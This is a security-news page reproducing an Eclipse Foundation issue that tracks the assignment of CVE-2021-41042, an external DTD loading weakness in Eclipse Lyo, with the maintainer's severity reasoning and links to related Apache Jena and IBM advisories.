Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2021-41042: External DTD access in Eclipse Lyo (#287) · Issues · Eclipse Foundation / EMO Team / EMO

In Eclipse Lyo versions 1.0.0 to 4.1.0, a TransformerFactory is initialized with the defaults that do not restrict DTD loading when working with RDF/XML. This allows an attacker to cause an external DTD to be retrieved.

CVE
#vulnerability#apache#git#java#oracle#auth

Skip to content

**GitLab **

  • Menu

Projects Groups Snippets

  • Help

    • Help

    • Support

    • Community forum

    • Submit feedback

  • Sign in

  • Eclipse Foundation
  • EMO Team
  • EMO
  • Issues
  • #287

Closed

Open

Created May 05, 2022 by Andrii Berezovskyi@aberezovsky6 of 6 tasks completed6/6 tasks

External DTD access in Eclipse Lyo

The Eclipse Foundation is a Common Vulnerabilities and Exposures (CVE) Numbering Authority. This issue it used to request and track the progress of the assignment of a CVE for a vulnerability in the project code for an Eclipse open source project.

Basic information

Project name: Eclipse Lyo

Project id: technology.lyo

Versions affected: [1.0.0, 4.1.0]

Common Weakness Enumeration:

  • CWE-611

Common Vulnerability Scoring System: {cvss}

I don’t know the right score, as I don’t have a proven exploit for it. I simply fixed the SonarCloud warning and I assume the score is similar to a very similar issue in Apache Jena. However, they had two CVEs, one for just external DTD loading, which has a 4.5 score (CVE-2022-28890) and another one for potential XXE code execution which has a score of 7.5 (CVE-2021-39239). My assessment is https://nvd.nist.gov/vuln-metrics/cvss/v2-calculator?vector=(AV:N/AC:M/Au:S/C:N/I:P/A:P/E:U/RL:OF/RC:C/CDP:L/TD:ND/CR:ND/IR:ND/AR:ND or https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:L&version=3.1 for v3) assuming the REST API getting attacked is protected and the attacker needs valid credentials to access the API. The rating could be worse if users expose an API that does not require auth (our SDK does not enforce it): https://nvd.nist.gov/vuln-metrics/cvss/v2-calculator?vector=(AV:N/AC:M/Au:S/C:N/I:P/A:P/E:U/RL:OF/RC:C/CDP:L/TD:ND/CR:ND/IR:ND/AR:ND)

Summary:

In Eclipse Lyo versions 1.0.0 to 4.1.0, a TransformerFactory is initialized with the defaults that do not restrict DTD loading when working with RDF/XML. This allows an attacker to cause an external DTD to be retrieved.

Links:

  • https://docs.oracle.com/en/java/javase/17/security/java-api-xml-processing-jaxp-security-guide.html#GUID-8CD65EF5-D113-4D5C-A564-B875C8625FAC (I am not sure what you mean though.)

Tracking

This section will completed by the project team.

  • We’re ready for this issue to be reported to the central authority (i.e., make this public now)
  • (when applicable) The GitHub Security Advisory is ready to be published now

Note that for those projects that host their repositories on GitHub, the use of GitHub Security Advisories is recommended but is not required.

This section will be completed by the EMO.

CVE: CVE-2021-41042

  • All required information is provided
  • CVE Assigned
  • Pushed to Mitre
  • Accepted by Mitre

Edited Jul 07, 2022 by Wayne Beaton

Copyright © Eclipse Foundation, Inc. All Rights Reserved. Privacy Policy | Terms of Use | Copyright Agent

Related news

GHSA-6296-mvgp-27hp: XML External Entity Reference in Eclipse Lyo

In Eclipse Lyo versions 1.0.0 to 4.1.0, a TransformerFactory is initialized with the defaults that do not restrict DTD loading when working with RDF/XML. This allows an attacker to cause an external DTD to be retrieved.

CVE-2021-29768: Security Bulletin: IBM Cognos Analytics has addressed multiple vulnerabilities

IBM Cognos Analytics 11.1.7, 11.2.0, and 11.2.1 could allow a low level user to obtain sensitive information from the details of the 'Cloud Storage' page for which they should not have access. IBM X-Force ID: 202682.

GHSA-gchv-364h-r896: XML External Entity Reference in apache jena

A vulnerability in the RDF/XML parser of Apache Jena allows an attacker to cause an external DTD to be retrieved. This issue affects Apache Jena version 4.4.0 and prior versions. Apache Jena 4.2.x and 4.3.x do not allow external entities.

CVE-2022-28890

A vulnerability in the RDF/XML parser of Apache Jena allows an attacker to cause an external DTD to be retrieved. This issue affects Apache Jena version 4.4.0 and prior versions. Apache Jena 4.2.x and 4.3.x do not allow external entities.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907